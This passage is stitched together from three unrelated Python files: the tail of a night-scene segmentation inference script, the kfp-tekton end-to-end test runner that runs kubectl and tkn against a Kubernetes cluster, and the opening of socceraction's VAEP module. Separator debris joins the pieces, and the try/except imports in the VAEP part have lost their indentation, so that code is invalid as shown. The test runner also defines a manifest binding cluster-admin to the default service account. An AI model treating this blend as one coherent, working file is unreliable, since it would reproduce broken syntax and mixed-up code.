    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    device = torch.device("cuda")
    args = get_arguments()
    if not os.path.exists(args.save):
        os.makedirs(args.save)
    # NOTE(review): no fallback if args.model is none of these three —
    # `model` would be unbound below; confirm the arg parser restricts choices.
    if args.model == 'PSPNet':
        model = PSPNet(num_classes=args.num_classes)
    if args.model == 'DeepLab':
        model = Deeplab(num_classes=args.num_classes)
    if args.model == 'RefineNet':
        model = RefineNet(num_classes=args.num_classes, imagenet=False)
    # load segmentation-model weights, keeping only keys present in the model
    saved_state_dict = torch.load(args.restore_from)
    model_dict = model.state_dict()
    saved_state_dict = {k: v for k, v in saved_state_dict.items() if k in model_dict}
    model_dict.update(saved_state_dict)
    model.load_state_dict(saved_state_dict)
    # load the light-enhancement network weights the same way
    lightnet = LightNet()
    saved_state_dict = torch.load(args.restore_from_light)
    model_dict = lightnet.state_dict()
    saved_state_dict = {k: v for k, v in saved_state_dict.items() if k in model_dict}
    model_dict.update(saved_state_dict)
    lightnet.load_state_dict(saved_state_dict)
    model = model.to(device)
    lightnet = lightnet.to(device)
    model.eval()
    lightnet.eval()
    testloader = data.DataLoader(zurich_night_DataSet(args.data_dir, args.data_list, set=args.set))
    interp = nn.Upsample(size=(1080, 1920), mode='bilinear', align_corners=True)
    # per-class prior frequencies, log-transformed then standardized into
    # per-class logit weights (scaled by args.std)
    weights = torch.log(torch.FloatTensor(
        [0.36869696, 0.06084986, 0.22824049, 0.00655399, 0.00877272, 0.01227341, 0.00207795, 0.0055127, 0.15928651,
         0.01157818, 0.04018982, 0.01218957, 0.00135122, 0.06994545, 0.00267456, 0.00235192, 0.00232904, 0.00098658,
         0.00413907])).cuda()
    weights = (torch.mean(weights) - weights) / torch.std(weights) * args.std + 1.0
    for index, batch in tqdm(enumerate(testloader)):
        if index % 10 == 0:
            print('%d processd' % index)
        image, name = batch
        image = image.to(device)
        with torch.no_grad():
            r = lightnet(image)
            enhancement = image + r
            if args.model == 'RefineNet':
                output2 = model(enhancement)
            else:
                _, output2 = model(enhancement)
        # print(output2) # here also negative numbers are occuring thus...Softmax is a need here...I think they are only comparing
        # logits..based on which they are producing results
        # reweight the class logits: expand to (N, 19, H, W) via transpose
        weights_prob = weights.expand(output2.size()[0], output2.size()[3], output2.size()[2], 19)
        weights_prob = weights_prob.transpose(1, 3)
        output2 = output2 * weights_prob
        # print(output2.size()) #torch.Size([1, 19, 68, 121])
        # output = interp(output2).cpu().data[0].numpy()
        output = interp(output2).cpu().data[0]
        # print(output) # negative numbers are coming due to which the 'nan' is frequently is obeserved....while calculating entropy
        # print(output.shape) #(19, 1080, 1920)
        ############entropy###############
        # entropy = prob_2_entropy(F.softmax(output, dim = 0))
        # # print(entropy)
        # # print(entropy.shape) # torch.Size([19, 1080, 1920])
        # # print('************')
        # entropy_map = torch.sum(entropy, dim = 0)
        # # print(entropy_map)
        # # print(entropy_map.shape) # torch.Size([1080, 1920])
        # # entropy_map[entropy_map>=0.5] = 1
        # # entropy_map[entropy_map<0.5] = 0
        # entropy_map_arr = np.asarray(entropy_map*255, dtype = np.uint8)
        # # print(entropy_map_arr)
        # entropy_map_img= Image.fromarray(entropy_map_arr).convert('L')
        # # print(name)
        # nm = name[0].split('/')[-1]
        # filename = '../scratch/saved_models/DANNet/dz_val/seg_entropy_map/'+ nm
        # entropy_map_img.save(filename)
        # # vutils.save_image(entropy_map, filename)
        ############entropy##################
        ###########variation_Ratio###########
        vrmap = prob_2_vr(F.softmax(output, dim=0))
        vrmap_arr = np.asarray(vrmap*255, dtype = np.uint8)
        # add on: binarize the uncertainty map at the 0.5 threshold (127/255)
        vrmap_arr[vrmap_arr>=127] = 255
        vrmap_arr[vrmap_arr<127] = 0
        # over
        vrmap_img = Image.fromarray(vrmap_arr).convert('L')
        nm = name[0].split('/')[-1]
        # NOTE(review): output directory is hard-coded and must already exist.
        filename = '../scratch/saved_models/DANNet/dz_val/seg_variation_map_bincd/'+ nm
        vrmap_img.save(filename)
        ###########variation_Ratio###########
        # output = output.transpose(1,2,0)
        # output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)
        # output_col = colorize_mask(output)
        # output = Image.fromarray(output)
        # ###### get the enhanced image
        # # enhancement = enhancement.cpu().data[0].numpy().transpose(1,2,0)
        # # enhancement = enhancement*mean_std[1]+mean_std[0]
        # # enhancement = (enhancement-enhancement.min())/(enhancement.max()-enhancement.min())
        # # enhancement = enhancement[:, :, ::-1]*255 # change to BGR
        # # enhancement = Image.fromarray(enhancement.astype(np.uint8))
        # ###### get the light
        # # light = r.cpu().data[0].numpy().transpose(1,2,0)
        # # light = (light-light.min())/(light.max()-light.min())
        # # light = light[:, :, ::-1]*255 # change to BGR
        # # light = Image.fromarray(light.astype(np.uint8))
        # name = name[0].split('/')[-1]
        # output.save('%s/%s' % (args.save, name))
        # output_col.save('%s/%s_color.png' % (args.save, name.split('.')[0]))
        # # enhancement.save('%s/%s_enhancement.png' % (args.save, name.split('.')[0]))
        # # light.save('%s/%s_light.png' % (args.save, name.split('.')[0]))
# Script entry point.
if __name__ == '__main__':
    main()
# ---------------------------------------------------------------------------
# run_e2e_tests (from jppgks/kfp-tekton)
# Copyright 2020 kubeflow.org
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import textwrap
import unittest
import yaml
from glob import glob
from packaging import version
from os import environ as env
from subprocess import run, SubprocessError
from time import sleep
# =============================================================================
# load test settings from environment variables (passed through make)
# =============================================================================
# get the Kubernetes context from the KUBECONFIG env var, override KUBECONFIG
# to target a different Kubernetes cluster
#    KUBECONFIG=/path/to/kube/config sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test KUBECONFIG=/path/to/kube/config
KUBECONFIG = env.get("KUBECONFIG")
# warn the user that the KUBECONFIG variable was not set so the target cluster
# might not be the expected one
if not KUBECONFIG:
    logging.warning("The environment variable 'KUBECONFIG' was not set.")
else:
    logging.warning("KUBECONFIG={}".format(KUBECONFIG))
# set or override the minimum required Tekton Pipeline version, default "v0.14.0":
#    TKN_PIPELINE_MIN_VERSION=v0.14 sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test TKN_PIPELINE_MIN_VERSION=v0.14
TKN_PIPELINE_MIN_VERSION = env.get("TKN_PIPELINE_MIN_VERSION", "v0.14.0")
# let the user know the expected Tekton Pipeline version
if env.get("TKN_PIPELINE_MIN_VERSION"):
    logging.warning("The environment variable 'TKN_PIPELINE_MIN_VERSION' was set to '{}'"
                    .format(TKN_PIPELINE_MIN_VERSION))
# set or override the minimum required Tekton CLI version, default "0.11.0":
#    TKN_CLIENT_MIN_VERSION=0.11 sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test TKN_CLIENT_MIN_VERSION=0.11
TKN_CLIENT_MIN_VERSION = env.get("TKN_CLIENT_MIN_VERSION", "0.11.0")
# let the user know the expected Tekton CLI version
if env.get("TKN_CLIENT_MIN_VERSION"):
    logging.warning("The environment variable 'TKN_CLIENT_MIN_VERSION' was set to '{}'"
                    .format(TKN_CLIENT_MIN_VERSION))
# Temporarily set GENERATE_GOLDEN_E2E_LOGS=True to (re)generate new "golden" log
# files after making code modifications that change the expected log output.
# To (re)generate all "golden" log output files from the command line run:
#    GENERATE_GOLDEN_E2E_LOGS=True sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test GENERATE_GOLDEN_E2E_LOGS=True
GENERATE_GOLDEN_E2E_LOGS = env.get("GENERATE_GOLDEN_E2E_LOGS", "False") == "True"
# let the user know this test run is not performing any verification
if GENERATE_GOLDEN_E2E_LOGS:
    logging.warning(
        "The environment variable 'GENERATE_GOLDEN_E2E_LOGS' was set to 'True'. "
        "Test cases will (re)generate the 'golden' log files instead of verifying "
        "the logs produced by running the Tekton YAML on a Kubernetes cluster.")
# when USE_LOGS_FROM_PREVIOUS_RUN=True, the logs from the previous pipeline run
# will be used for log verification or for regenerating "golden" log files:
#    USE_LOGS_FROM_PREVIOUS_RUN=True sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test USE_LOGS_FROM_PREVIOUS_RUN=True
# NOTE: this is problematic since multiple test cases (YAML files) use the same
#   pipelinerun name, so `tkn pipelinerun logs <pipelinerun-name>` will always
#   return the logs of the last test case running a pipeline with that name
# TODO: make sure each YAML file has a unique pipelinerun name
# ALSO: once we delete pipelineruns after success, logs won't be available after
#   that test execution
USE_LOGS_FROM_PREVIOUS_RUN = env.get("USE_LOGS_FROM_PREVIOUS_RUN", "False") == "True"
# let the user know we are using the logs produced during a previous test run
if USE_LOGS_FROM_PREVIOUS_RUN:
    logging.warning(
        "The environment variable 'USE_LOGS_FROM_PREVIOUS_RUN' was set to 'True'. "
        "Test cases will use the logs produced by a prior pipeline execution. "
        "The Tekton YAML will not be verified on a Kubernetes cluster.")
# set INCLUDE_TESTS environment variable to only run the specified E2E tests:
#    INCLUDE_TESTS=test_name1,test_name2 sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test INCLUDE_TESTS=test_name1,test_name2
INCLUDE_TESTS = env.get("INCLUDE_TESTS", "")
# let the user know we are only running specified test
if INCLUDE_TESTS:
    logging.warning("INCLUDE_TESTS={} ".format(INCLUDE_TESTS))
# set EXCLUDE_TESTS environment variable to exclude the specified E2E tests:
#    EXCLUDE_TESTS=test_name1,test_name2 sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test EXCLUDE_TESTS=test_name1,test_name2
EXCLUDE_TESTS = env.get("EXCLUDE_TESTS", "")
# let the user know which tests are excluded
if EXCLUDE_TESTS:
    logging.warning("EXCLUDE_TESTS={} ".format(EXCLUDE_TESTS))
# TODO: delete pipelineruns (and logs) after test run, keep failed runs (and logs)
#   if KEEP_FAILED_PIPELINERUNS=True
# KEEP_FAILED_PIPELINERUNS = env.get("KEEP_FAILED_PIPELINERUNS", "False") == "True"
# Set SLEEP_BETWEEN_TEST_PHASES=<seconds> (default: 5) to increase or decrease
# the sleep time between the test stages of starting a pipelinerun, then first
# attempting to get the pipelinerun status, and lastly to get the pipelinerun
# logs. Increase the sleep for under-powered Kubernetes clusters. The minimal
# recommended configuration for K8s clusters is 4 cores, 2 nodes, 16 GB RAM:
#    SLEEP_BETWEEN_TEST_PHASES=10 sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test SLEEP_BETWEEN_TEST_PHASES=10
SLEEP_BETWEEN_TEST_PHASES = int(env.get("SLEEP_BETWEEN_TEST_PHASES", "5"))
# let the user know a non-default sleep was configured (the original comment
# here was copy-pasted from the GENERATE_GOLDEN_E2E_LOGS stanza)
if env.get("SLEEP_BETWEEN_TEST_PHASES"):
    logging.warning(
        "The environment variable 'SLEEP_BETWEEN_TEST_PHASES' was set to '{}'. "
        "Default is '5' seconds. Increasing this value should improve the test "
        "success rate on a slow Kubernetes cluster.".format(SLEEP_BETWEEN_TEST_PHASES))
# set RERUN_FAILED_TESTS_ONLY=True, to only re-run those E2E tests that failed in
# the previous test run:
#    RERUN_FAILED_TESTS_ONLY=True sdk/python/tests/run_e2e_tests.sh
# or:
#    make e2e_test RERUN_FAILED_TESTS_ONLY=True
RERUN_FAILED_TESTS_ONLY = env.get("RERUN_FAILED_TESTS_ONLY", "False") == "True"
# the file used to keep a record of failed tests
failed_tests_file = os.path.join(os.path.dirname(__file__), ".failed_tests")
# the list of test_names that failed in the previous test run
previously_failed_tests = []
# let the user know we are running previously failed tests only
if RERUN_FAILED_TESTS_ONLY:
    logging.warning("The environment variable 'RERUN_FAILED_TESTS_ONLY' was set to 'True'.")
    if os.path.exists(failed_tests_file):
        with open(failed_tests_file, 'r') as f:
            previously_failed_tests = f.read().splitlines()
        logging.warning(
            "Running previously failed tests only: {}".format(previously_failed_tests))
    else:
        logging.warning("Could not find file {}".format(os.path.abspath(failed_tests_file)))
# =============================================================================
# non-configurable test settings
# =============================================================================
# ignore pipelines with unpredictable log output or complex prerequisites
# TODO: revisit this list, try to rewrite those Python DSLs in a way that they
#   will produce logs which can be verified. One option would be to keep more
#   than one "golden" log file to match either of the desired possible outputs
ignored_yaml_files = [
    "big_data_passing.yaml",  # does not complete in a reasonable time frame
    "katib.yaml",  # service account needs Katib permission, takes too long doing 9 trail runs
    "retry.yaml",  # designed to occasionally fail (randomly) if number of retries exceeded
    "timeout.yaml",  # random failure (by design) ... would need multiple golden log files to compare to
    "tolerations.yaml",  # designed to fail, test show only how to add the toleration to the pod
    "volume.yaml",  # need to rework the credentials part
    "volume_op.yaml",  # need to delete PVC before/after test run
    "volume_snapshot_op.yaml",  # only works on Minikube, K8s alpha feature, requires a feature gate from K8s master
    "parallel_join_with_logging.yaml"  # need to work with S3(minio) avaibale, and this is an experimental feature.
]
# run pipelines in "kubeflow" namespace as some E2E tests depend on Minio
# for artifact storage in order to access secrets:
namespace = "kubeflow"
# KFP doesn't allow any resource to be created by a pipeline. The API has an option
# for users to provide their own service account that has those permissions.
# see https://github.com/kubeflow/kfp-tekton/blob/master/sdk/sa-and-rbac.md
# TODO: add to setUpClass method
# NOTE(review): rbac.authorization.k8s.io/v1beta1 was removed in Kubernetes
# 1.22 — this manifest needs apiVersion rbac.authorization.k8s.io/v1 on
# newer clusters.
rbac = textwrap.dedent("""\
    apiVersion: rbac.authorization.k8s.io/v1beta1
    kind: ClusterRoleBinding
    metadata:
      name: default-admin
    subjects:
      - kind: ServiceAccount
        name: default
        namespace: {}
    roleRef:
      kind: ClusterRole
      name: cluster-admin
      apiGroup: rbac.authorization.k8s.io
    """.format(namespace))
# =============================================================================
# ensure we have what we need, abort early instead of failing every test
# =============================================================================
# tests require Tekton Pipelines and Kubeflow Pipelines deployed on Kubernetes
def _verify_tekton_cluster():
    """Abort the test run early unless the target cluster is usable.

    Checks that the Tekton Pipelines controller service and the KFP
    'ml-pipeline' service exist, and that the `tkn` CLI and Tekton
    Pipelines meet the minimum required versions. Calls exit() on any
    failure so every test doesn't fail individually.
    """
    def exit_on_error(cmd, expected_output=None):
        """Run *cmd*; exit the process on non-zero rc or missing output."""
        process = run(cmd.split(), capture_output=True, timeout=10, check=False)
        if not process.returncode == 0:
            # include stderr — that is where kubectl/tkn report failures
            logging.error("Process returned non-zero exit code: `{}` --> `{}` `{}`"
                          .format(cmd, process.stdout, process.stderr))
            exit(process.returncode)
        cmd_output = process.stdout.decode("utf-8").strip("'")
        if expected_output and expected_output not in cmd_output:
            logging.error("Command '{}' did not return expected output '{}': {}"
                          .format(cmd, expected_output, process.stdout))
            exit(1)
        return cmd_output
    exit_on_error("kubectl get svc tekton-pipelines-controller -n tekton-pipelines")
    exit_on_error("kubectl get svc ml-pipeline -n {}".format(namespace))
    tkn_ver_out = exit_on_error("tkn version")
    # guard the regexes: the original `.group(1)` raised a bare AttributeError
    # when `tkn version` output did not match the expected format
    pipeline_match = re.search(r"^Pipeline version: (.*)$", tkn_ver_out, re.MULTILINE)
    client_match = re.search(r"^Client version: (.*)$", tkn_ver_out, re.MULTILINE)
    if not pipeline_match or not client_match:
        logging.error("Could not parse `tkn version` output: {}".format(tkn_ver_out))
        exit(1)
    tkn_pipeline_ver = pipeline_match.group(1)
    tkn_client_ver = client_match.group(1)
    assert version.parse(TKN_PIPELINE_MIN_VERSION) <= version.parse(tkn_pipeline_ver),\
        "Tekton Pipeline version must be >= {}, found '{}'".format(TKN_PIPELINE_MIN_VERSION, tkn_pipeline_ver)
    assert version.parse(TKN_CLIENT_MIN_VERSION) <= version.parse(tkn_client_ver),\
        "Tekton CLI version must be >= {}, found '{}'".format(TKN_CLIENT_MIN_VERSION, tkn_client_ver)


# verify we have a working Tekton cluster
_verify_tekton_cluster()
# =============================================================================
# TestCase class with utility methods, the actual test_... case methods will
# get generated dynamically below
# =============================================================================
class TestCompilerE2E(unittest.TestCase):
    """Dynamically generated end-to-end test cases taking each of the pipelines
    which were generated by the `kfp_tekton.compiler` and running them on a
    Kubernetes cluster with Tekton Pipelines installed."""

    # unittest output verbosity used by the __main__ runner at the bottom of this file
    verbosity = 2
    # base names of failed test methods, persisted to `failed_tests_file`
    # so a subsequent run with RERUN_FAILED_TESTS_ONLY can replay them
    failed_tests = set()

    @classmethod
    def setUpClass(cls):
        # TODO: set up RBAC and other pre test requirements
        logging.warning("Ignoring the following pipelines: {}".format(
            ", ".join(ignored_yaml_files)))

    @classmethod
    def tearDownClass(cls):
        # TODO: cleanup cluster resources, pods, maybe inject labels to each
        #   resource before deploying pipelines to identify the resources
        #   created during test execution and delete via label selectors after
        logging.warning("The following pipelines were ignored: {}".format(
            ", ".join(ignored_yaml_files)))
        # persist the failed-test list (or clear it after a green run)
        if cls.failed_tests:
            with open(failed_tests_file, 'w') as f:
                f.write("\n".join(sorted(cls.failed_tests)))
        else:
            if os.path.exists(failed_tests_file):
                os.remove(failed_tests_file)

    def tearDown(self) -> None:
        # Record the failing pipeline name after each test method.
        # NOTE(review): `_outcome` and `_feedErrorsToResult` are private
        #   unittest internals and change between Python versions -- confirm
        #   on interpreter upgrades.
        if hasattr(self, '_outcome'):
            result = self.defaultTestResult()
            self._feedErrorsToResult(result, self._outcome.errors)
            if result.failures or result.errors:
                # strip the ".i_...", ".ii_...", ".iii_..." phase suffix so a
                # rerun repeats all three phases of the failed pipeline
                self.failed_tests.add(self._testMethodName.split(".")[0])

    def _delete_pipelinerun(self, name):
        """Delete the PipelineRun `name` (ignoring errors) and pause briefly."""
        del_cmd = "tkn pipelinerun delete -f {} -n {}".format(name, namespace)
        run(del_cmd.split(), capture_output=True, timeout=10, check=False)
        # TODO: find a better way than to sleep, but some PipelineRuns cannot
        #   be recreated right after the previous pipelineRun has been deleted
        sleep(SLEEP_BETWEEN_TEST_PHASES)

    def _start_pipelinerun(self, yaml_file):
        """Apply the compiled pipeline YAML, which starts the PipelineRun."""
        kube_cmd = "kubectl apply -f \"{}\" -n {}".format(yaml_file, namespace)
        kube_proc = run(kube_cmd.split(), capture_output=True, timeout=10, check=False)
        self.assertEqual(kube_proc.returncode, 0,
                         "Process returned non-zero exit code: {} -> {}".format(
                             kube_cmd, kube_proc.stderr))
        # TODO: find a better way than to sleep, but some PipelineRuns take longer
        #   to be created and logs may not be available yet even with --follow or
        #   when attempting (and retrying) to get the pipelinerun status
        sleep(SLEEP_BETWEEN_TEST_PHASES)

    def _get_pipelinerun_status(self, name, retries: int = 20) -> str:
        """Poll `tkn pipelinerun describe` until a terminal status is reached.

        :param name: name of the PipelineRun to query
        :param retries: maximum number of polling attempts
        :return: last observed status reason ("Succeeded", "Completed",
            "Failed"), or "Unknown" if no terminal status was observed
        """
        tkn_status_cmd = "tkn pipelinerun describe %s -n %s -o jsonpath=" \
                         "'{.status.conditions[0].reason}'" % (name, namespace)
        status = "Unknown"
        for i in range(0, retries):
            try:
                tkn_status_proc = run(tkn_status_cmd.split(), capture_output=True,
                                      timeout=10, check=False)
                if tkn_status_proc.returncode == 0:
                    status = tkn_status_proc.stdout.decode("utf-8").strip("'")
                    if status in ["Succeeded", "Completed", "Failed"]:
                        return status
                    logging.debug("tkn pipeline '{}' status: {} ({}/{})".format(
                        name, status, i + 1, retries))
                else:
                    logging.error("Could not get pipelinerun status ({}/{}): {}".format(
                        i + 1, retries, tkn_status_proc.stderr.decode("utf-8")))
            except SubprocessError:
                logging.exception("Error trying to get pipelinerun status ({}/{})".format(
                    i + 1, retries))
            sleep(SLEEP_BETWEEN_TEST_PHASES)
        return status

    def _get_pipelinerun_logs(self, name, timeout: int = 120) -> str:
        """Return the combined task logs of the PipelineRun `name`."""
        sleep(SLEEP_BETWEEN_TEST_PHASES * 2)  # if we don't wait, we often only get logs of some pipeline tasks
        tkn_logs_cmd = "tkn pipelinerun logs {} -n {}".format(name, namespace)
        tkn_logs_proc = run(tkn_logs_cmd.split(), capture_output=True, timeout=timeout, check=False)
        self.assertEqual(tkn_logs_proc.returncode, 0,
                         "Process returned non-zero exit code: {} -> {}".format(
                             tkn_logs_cmd, tkn_logs_proc.stderr))
        return tkn_logs_proc.stdout.decode("utf-8")

    def _verify_logs(self, name, golden_log_file, test_log):
        """Compare sanitized run logs against the golden log file, or (re)write
        the golden file when GENERATE_GOLDEN_E2E_LOGS is set."""
        if GENERATE_GOLDEN_E2E_LOGS:
            with open(golden_log_file, 'w') as f:
                f.write(test_log)
        else:
            try:
                with open(golden_log_file, 'r') as f:
                    golden_log = f.read()
                # sanitize both sides so timestamps/pod ids/numbers don't diff
                sanitized_golden_log = self._sanitize_log(golden_log)
                sanitized_test_log = self._sanitize_log(test_log)
                self.maxDiff = None
                self.assertEqual(sanitized_golden_log,
                                 sanitized_test_log,
                                 msg="PipelineRun '{}' did not produce the expected "
                                     " log output: {}".format(name, golden_log_file))
            except FileNotFoundError:
                logging.error("Could not find golden log file '{}'."
                              " Generate it by re-running this test with"
                              " GENERATE_GOLDEN_E2E_LOGS='True'".format(golden_log_file))
                raise

    def _sanitize_log(self, log) -> str:
        """Sanitize log output by removing or replacing elements that differ
        from one pipeline execution to another:
        - timestamps like 2020-06-08T21:58:06Z, months, weekdays
        - identifiers generated by Kubernetes i.e. for pod names
        - any numbers
        - strip trailing spaces and remove empty lines
        :param log: the pipeline execution log output
        :return: the sanitized log output fit for comparing to previous logs
        """
        # copied from datetime, cannot be imported, sadly
        _DAYNAMES = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
        _MONTHNAMES = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
                       "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
        # depending on cluster capacity and utilization and the timing of the
        # log listener some task logs contain lines that differ from test run
        # to test run, like the progress output of file copy operations or a
        # server process receiving a termination signal
        lines_to_remove = [
            "Pipeline still running ...",
            "Server is listening on",
            "Unknown signal terminated",
            r"Total: .+, Transferred: .+, Speed: .+",
            r"localhost:.*GET / HTTP",
        ]
        # replacements are used on multi-line strings, so '...\n' will be matched by '...$'
        replacements = [
            (r"(-[-0-9a-z]{3}-[-0-9a-z]{5})(?=[ -/\]\"]|$)", r"-XXX-XXXXX"),
            (r"uid:[0-9a-z]{8}(-[0-9a-z]{4}){3}-[0-9a-z]{12}",
             "uid:{}-{}-{}-{}-{}".format("X" * 8, "X" * 4, "X" * 4, "X" * 4, "X" * 12)),
            (r"resourceVersion:[0-9]+ ", "resourceVersion:-------- "),
            (r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z", "DATETIME"),
            (r"{}".format("|".join(_MONTHNAMES)), "MONTH"),
            (r"{}".format("|".join(_DAYNAMES)), "DAY"),
            (r"\d", "-"),
            (r" +$", ""),
            (r" +\r", r"\n"),
            (r"^$\n", ""),
            (r"\n^$", ""),
        ]
        sanitized_log = log
        # replace "random" generated parts of the log text
        for pattern, repl in replacements:
            sanitized_log = re.sub(pattern, repl, sanitized_log, flags=re.MULTILINE)
        # sort lines since parallel tasks produce log lines in unpredictable order
        # remove erratic lines which only show up some times
        sanitized_log = "\n".join(
            sorted(filter(lambda l: not any(re.findall(r, l) for r in lines_to_remove),
                          sanitized_log.splitlines())))
        return sanitized_log

    def _run_test__validate_tekton_yaml(self, name, yaml_file):
        # `kubectl apply` validates the YAML against the Tekton CRDs and
        # starts the pipelineRun as a side effect
        if not USE_LOGS_FROM_PREVIOUS_RUN:
            self._delete_pipelinerun(name)
            self._start_pipelinerun(yaml_file)

    def _run_test__verify_pipelinerun_success(self, name):
        # wait for a terminal pipelineRun status and require success
        status = self._get_pipelinerun_status(name)
        self.assertIn(status, ["Succeeded", "Completed"])

    def _run_test__verify_pipelinerun_logs(self, name, log_file):
        # compare the captured run log against the golden log file
        test_log = self._get_pipelinerun_logs(name)
        self._verify_logs(name, log_file, test_log)

    # deprecated, use `self._run_test__xyz` methods separately
    def _run_test(self, name, yaml_file, log_file):
        self._run_test__validate_tekton_yaml(name, yaml_file)
        self._run_test__verify_pipelinerun_success(name)
        self._run_test__verify_pipelinerun_logs(name, log_file)
# =============================================================================
# dynamically generate test cases from Tekton YAML files in compiler testdata
# =============================================================================
def _generate_test_cases(pipeline_runs: [dict]):
    """Attach three test methods per compiled pipeline to TestCompilerE2E:
    YAML validation (which also starts the run), run-status check, and
    golden-log comparison."""

    def make_validate_yaml(run_name, yaml_file):
        def test_function(self):
            self._run_test__validate_tekton_yaml(run_name, yaml_file)
        return test_function

    def make_check_status(run_name):
        def test_function(self):
            self._run_test__verify_pipelinerun_success(run_name)
        return test_function

    def make_verify_logs(run_name, log_file):
        def test_function(self):
            self._run_test__verify_pipelinerun_logs(run_name, log_file)
        return test_function

    for run_spec in pipeline_runs:
        base_name = os.path.splitext(os.path.basename(run_spec["yaml_file"]))[0]
        # the i/ii/iii suffixes keep the three phases of one pipeline in
        # alphabetical -- and therefore unittest execution -- order
        generated_tests = [
            ('test_{0}.i_validate_yaml'.format(base_name),
             make_validate_yaml(run_spec["name"], run_spec["yaml_file"])),
            ('test_{0}.ii_check_run_success'.format(base_name),
             make_check_status(run_spec["name"])),
            ('test_{0}.iii_verify_logs'.format(base_name),
             make_verify_logs(run_spec["name"], run_spec["log_file"])),
        ]
        for test_name, test_fn in generated_tests:
            setattr(TestCompilerE2E, test_name, test_fn)
def _generate_test_list(file_name_expr="*.yaml") -> [dict]:
    """Build the list of pipelineRun specs (run name, YAML path, golden log
    path) for every compiler testdata file passing the include/exclude
    filters."""

    def accept(yaml_file_path):
        # apply the ignore/exclude/include/rerun-failed filters as guards
        file_name = os.path.basename(yaml_file_path)
        test_name = 'test_{0}'.format(os.path.splitext(file_name)[0])
        if file_name in ignored_yaml_files:
            return False
        if test_name in EXCLUDE_TESTS:
            return False
        if INCLUDE_TESTS and test_name not in INCLUDE_TESTS:
            return False
        if RERUN_FAILED_TESTS_ONLY and test_name not in previously_failed_tests:
            return False
        return True

    testdata_dir = os.path.join(os.path.dirname(__file__), "testdata")
    selected_files = sorted(filter(accept, glob(os.path.join(testdata_dir, file_name_expr))))
    pipeline_runs = []
    for yaml_file in selected_files:
        with open(yaml_file, 'r') as f:
            pipeline_doc = yaml.safe_load(f)
        pipeline_runs.append({
            "name": pipeline_doc["metadata"]["name"],
            "yaml_file": yaml_file,
            "log_file": yaml_file.replace(".yaml", ".log"),
        })
    return pipeline_runs
# generate a test case for every (non-ignored, non-filtered) compiler testdata YAML
_generate_test_cases(_generate_test_list("*.yaml"))
# =============================================================================
# run the E2E tests as a Python script:
# python3 compiler/compiler_tests_e2e.py
#
# ... as opposed to:
# python3 -m unittest compiler.compiler_tests_e2e
#
# ... because the test_xyz methods are dynamically generated
# =============================================================================
if __name__ == '__main__':
    # unittest.main() calls sys.exit() when the test run completes, so any
    # statement placed after it is unreachable. Emit the summary of ignored
    # pipelines *before* running the tests (tearDownClass logs it again at
    # the end of the run), instead of in dead code after unittest.main().
    logging.warning("The following pipelines were ignored: {}".format(
        ", ".join(ignored_yaml_files)))
    unittest.main(verbosity=TestCompilerE2E.verbosity)
|
<filename>socceraction/vaep/base.py
# -*- coding: utf-8 -*-
"""Implements the VAEP framework.
Attributes
----------
xfns_default : list(callable)
The default VAEP features.
"""
import math
from typing import Any, Callable, Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
from sklearn.exceptions import NotFittedError
from sklearn.metrics import brier_score_loss, roc_auc_score
import socceraction.spadl as spadlcfg
from . import features as fs
from . import formula as vaep
from . import labels as lab
try:
import xgboost
except ImportError:
xgboost = None # type: ignore
try:
import catboost
except ImportError:
catboost = None # type: ignore
try:
import lightgbm
except ImportError:
lightgbm = None # type: ignore
# Default VAEP feature transformers. Each callable maps a list of gamestate
# DataFrames to a feature DataFrame (see socceraction.vaep.features); their
# concatenated output describes one game state.
xfns_default = [
    fs.actiontype_onehot,
    fs.result_onehot,
    fs.actiontype_result_onehot,
    fs.bodypart_onehot,
    fs.time,
    fs.startlocation,
    fs.endlocation,
    fs.startpolar,
    fs.endpolar,
    fs.movement,
    fs.team,
    fs.time_delta,
    fs.space_delta,
    fs.goalscore,
]
class VAEP:
    """
    An implementation of the VAEP framework.

    VAEP (Valuing Actions by Estimating Probabilities) [1]_ defines the
    problem of valuing a soccer player's contributions within a match as
    a binary classification problem and rates actions by estimating its effect
    on the short-term probabilities that a team will both score and concede.

    Parameters
    ----------
    xfns : list
        List of feature transformers (see :mod:`socceraction.vaep.features`)
        used to describe the game states. Uses :attr:`~socceraction.vaep.base.xfns_default`
        if None.
    nb_prev_actions : int, default=3  # noqa: DAR103
        Number of previous actions used to describe the game state.

    References
    ----------
    .. [1] <NAME>, <NAME>, <NAME>, and <NAME>.
        "Actions speak louder than goals: Valuing player actions in soccer." In
        Proceedings of the 25th ACM SIGKDD International Conference on Knowledge
        Discovery & Data Mining, pp. 1851-1861. 2019.
    """

    # project modules bound as class attributes so subclasses can substitute
    # alternative SPADL configs, feature/label generators or VAEP formulas
    _spadlcfg = spadlcfg
    _fs = fs
    _lab = lab
    _vaep = vaep

    def __init__(
        self,
        xfns: Optional[List[Callable[[List[pd.DataFrame]], pd.DataFrame]]] = None,
        nb_prev_actions: int = 3,
    ) -> None:
        # one fitted classifier per label column ("scores" and "concedes")
        self.__models: Dict[str, Any] = {}
        self.xfns = xfns_default if xfns is None else xfns
        self.yfns = [self._lab.scores, self._lab.concedes]
        self.nb_prev_actions = nb_prev_actions

    def compute_features(self, game: pd.Series, game_actions: pd.DataFrame) -> pd.DataFrame:
        """
        Transform actions to the feature-based representation of game states.

        Parameters
        ----------
        game : pd.Series
